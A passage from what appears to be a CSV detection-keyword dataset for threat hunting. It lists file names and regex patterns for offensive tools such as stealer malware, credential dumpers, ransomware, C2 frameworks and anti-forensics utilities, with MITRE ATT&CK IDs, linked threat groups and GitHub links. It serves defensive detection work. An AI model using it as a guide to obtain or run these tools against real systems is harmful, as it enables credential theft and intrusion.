"*\fenty.py*",".{0,1000}\\fenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","15421" "*\Ferrari.ps1*",".{0,1000}\\Ferrari\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15422" "*\Fertliser.exe*",".{0,1000}\\Fertliser\.exe.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","15423" "*\Fertliser.pdb*",".{0,1000}\\Fertliser\.pdb.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","15424" "*\File Encrypter Reverse Bytes.exe*",".{0,1000}\\File\sEncrypter\sReverse\sBytes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15426" "*\File Encrypter Reverse Bytes.exe*",".{0,1000}\\File\sEncrypter\sReverse\sBytes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15427" "*\File Encrypter Reverse Bytes.vshost.exe*",".{0,1000}\\File\sEncrypter\sReverse\sBytes\.vshost\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15428" "*\FILE 
RECOVERY.txt*",".{0,1000}\\FILE\sRECOVERY\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15429" "*\File To Base64.exe*",".{0,1000}\\File\sTo\sBase64\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15430" "*\FileBasic_x64_Release.exe*",".{0,1000}\\FileBasic_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15433" "*\FileCrawlerMITM.py*",".{0,1000}\\FileCrawlerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","15434" "*\Files\ContainersFileUrls.txt*",".{0,1000}\\Files\\ContainersFileUrls\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation 
tool","https://github.com/NetSPI/MicroBurst","1","0","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","15435" "*\File-Server.ps1*",".{0,1000}\\File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15436" "*\File-Server.ps1*",".{0,1000}\\File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15437" "*\filetransfer.py*",".{0,1000}\\filetransfer\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","15438" "*\File-Tunnel-main*",".{0,1000}\\File\-Tunnel\-main.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15439" 
"*\File-Tunnel-master*",".{0,1000}\\File\-Tunnel\-master.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15440" "*\fileUpload.ps1*",".{0,1000}\\fileUpload\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","15441" "*\find-computer.py*",".{0,1000}\\find\-computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15446" "*\findDelegation.py*",".{0,1000}\\findDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15447" "*\firefox\getCredsfirefox.h*",".{0,1000}\\firefox\\getCredsfirefox\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","15449" "*\firefox\getCredsfirefox2.h*",".{0,1000}\\firefox\\getCredsfirefox2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","15450" "*\follina.py*",".{0,1000}\\follina\.py.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","15451" 
"*\follow_attacker_commands.py*",".{0,1000}\\follow_attacker_commands\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","15452" "*\foobar123\pipe\spoolss*",".{0,1000}\\foobar123\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#namedpipe","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","15453" "*\Forensia.exe*",".{0,1000}\\Forensia\.exe.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","15454" "*\forensia.pdb*",".{0,1000}\\forensia\.pdb.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","15455" "*\Forensike.dmp*",".{0,1000}\\Forensike\.dmp.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash 
dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","15456" "*\Forensike.ps1*",".{0,1000}\\Forensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","15457" "*\forensike_results.txt*",".{0,1000}\\forensike_results\.txt.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","15458" "*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","ForgeCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15459" "*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","15460" 
"*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15461" "*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15462" "*\ForgeCert.pdb*",".{0,1000}\\ForgeCert\.pdb.{0,1000}","offensive_tool_keyword","ForgeCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15463" 
"*\ForgeCert.pdb*",".{0,1000}\\ForgeCert\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15464" "*\ForkDump.cpp*",".{0,1000}\\ForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15465" "*\ForkDump.exe*",".{0,1000}\\ForkDump\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15466" "*\ForkDump.vcxproj*",".{0,1000}\\ForkDump\.vcxproj.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15467" "*\ForkLib.cpp*",".{0,1000}\\ForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15468" 
"*\ForkLib.vcxproj*",".{0,1000}\\ForkLib\.vcxproj.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15469" "*\ForkPlayground.sln*",".{0,1000}\\ForkPlayground\.sln.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15470" "*\FormatListCommand.cs",".{0,1000}\\FormatListCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15471" "*\FormatTableCommand.cs",".{0,1000}\\FormatTableCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15472" "*\FormThief-main*",".{0,1000}\\FormThief\-main.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","N/A","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","15473" "*\FoxmailDump.cpp*",".{0,1000}\\FoxmailDump\.cpp.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","15474" "*\Free porn.exe*",".{0,1000}\\Free\sporn\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15475" "*\freeze.go",".{0,1000}\\freeze\.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","15481" "*\frpc.exe*",".{0,1000}\\frpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15492" "*\FruityC2-Client*",".{0,1000}\\FruityC2\-Client.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","15494" "*\fscan.exe*",".{0,1000}\\fscan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 
- T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15495" "*\fscan.exe*",".{0,1000}\\fscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15496" "*\fscan\common\proxy*",".{0,1000}\\fscan\\common\\proxy.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15497" "*\fscan\WebScan\pocs\*",".{0,1000}\\fscan\\WebScan\\pocs\\.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15498" "*\fscan32.exe*",".{0,1000}\\fscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15499" "*\fscan64.exe*",".{0,1000}\\fscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15500" "*\fscanarm64.exe*",".{0,1000}\\fscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15501" "*\fscanarmv6.exe*",".{0,1000}\\fscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15502" "*\fscanarmv7.exe*",".{0,1000}\\fscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15503" "*\ft.dll*",".{0,1000}\\ft\.dll.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15504" "*\ft.exe --*",".{0,1000}\\ft\.exe\s\-\-.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15505" "*\ft.exe"" 